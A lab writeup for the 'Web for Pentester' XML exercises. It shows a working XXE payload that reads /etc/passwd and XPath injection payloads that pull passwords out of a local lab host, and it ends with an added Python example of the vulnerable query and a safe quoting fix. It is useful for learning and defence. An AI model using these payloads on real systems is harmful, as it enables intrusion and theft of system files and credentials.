Web for Pentester writeup: XML attacks
XML attacks
Example 1 - XML External Entity injection (XXE)
![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808181259909-649426507.png)
Payload (`%26` is the URL-encoded `&`, so the element body is the entity reference `&b;`)
`http://192.168.219.136/xml/example1.php?xml= <!DOCTYPE a[<!ENTITY b SYSTEM "file:///etc/passwd">]><c>%26b;</c>`
![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808181311103-20902236.png)
Example 2 - XPath injection
![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808181319011-891038369.png)
Entering a single quote produces an error. The error message mentions an xpath function, so this is presumably XPath injection.
<1> `http://192.168.219.136/xml/example2.php?name=hacker' and '1' ='1`
![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808181324774-2007834750.png)
<2> `http://192.168.219.136/xml/example2.php?name=hacker' and '1' ='2`
![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808181330451-1657338604.png)
<3> `http://192.168.219.136/xml/example2.php?name=hacker' or '1' ='1`
![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808181337206-2047698607.png)
<4> `http://192.168.219.136/xml/example2.php?name=hacker' or '1' ='2`
![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808181441610-362099624.png)
From these results, the XPath code is `[PARENT NODES]/name[.='[INPUT]']/[CHILD NODES]`
Payload (the trailing `%00` cuts off the rest of the original query)
`http://192.168.219.136/xml/example2.php?name=' or 1=1]/parent::*/child::node()%00`
![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808181446807-1802045137.png)
`http://192.168.219.136/xml/example2.php?name=hacker' or 1=1]/parent::*/password%00`
![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808181450842-1008994050.png)
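The fix for the query shape deduced in Example 2, as an added Python example that is not part of the original writeup or the lab's code: the input is quoted as a single XPath 1.0 string literal, so it can no longer close the `[.='...']` predicate. The `/data/user/name` layout, the sample XML and all function names are assumptions made for illustration.

```python
import xml.etree.ElementTree as ET

# Constructed sample data; the layout is an assumption, not the lab's file.
USERS_XML = """<data>
  <user><name>hacker</name><password>constructed-pw-1</password></user>
  <user><name>admin</name><password>constructed-pw-2</password></user>
</data>"""


def xpath_literal(value: str) -> str:
    """Quote value as an XPath 1.0 string literal that input cannot close."""
    if "\x00" in value:
        # The page's payloads end in %00; a NUL is never a valid name.
        raise ValueError("NUL byte in input")
    if "'" not in value:
        return "'" + value + "'"
    if '"' not in value:
        return '"' + value + '"'
    # XPath 1.0 has no escape character: split on ' and rejoin with concat().
    parts = value.split("'")
    return "concat(" + ", \"'\", ".join("'" + p + "'" for p in parts) + ")"


def naive_query(name: str) -> str:
    """Vulnerable pattern: input pasted between the quotes."""
    return "./user/name[.='" + name + "']"


def safe_query(name: str) -> str:
    """Same query with the input kept inside one string literal."""
    return "./user/name[.=" + xpath_literal(name) + "]"


def lookup(name: str) -> list:
    """Run the safe query. ElementTree implements only an XPath subset
    (no concat()), so this demo is limited to inputs that do not contain
    both quote kinds."""
    root = ET.fromstring(USERS_XML)
    return [el.text for el in root.findall(safe_query(name))]


if __name__ == "__main__":
    payload = "' or 1=1]/parent::*/child::node()"  # from the page, %00 dropped
    print(naive_query(payload))   # predicate is closed by the input
    print(safe_query(payload))    # input stays inside the literal
    print(lookup("hacker"), lookup(payload))
```

With a full XPath engine that supports variable binding, passing the name as a bound variable is preferable to building the literal by hand.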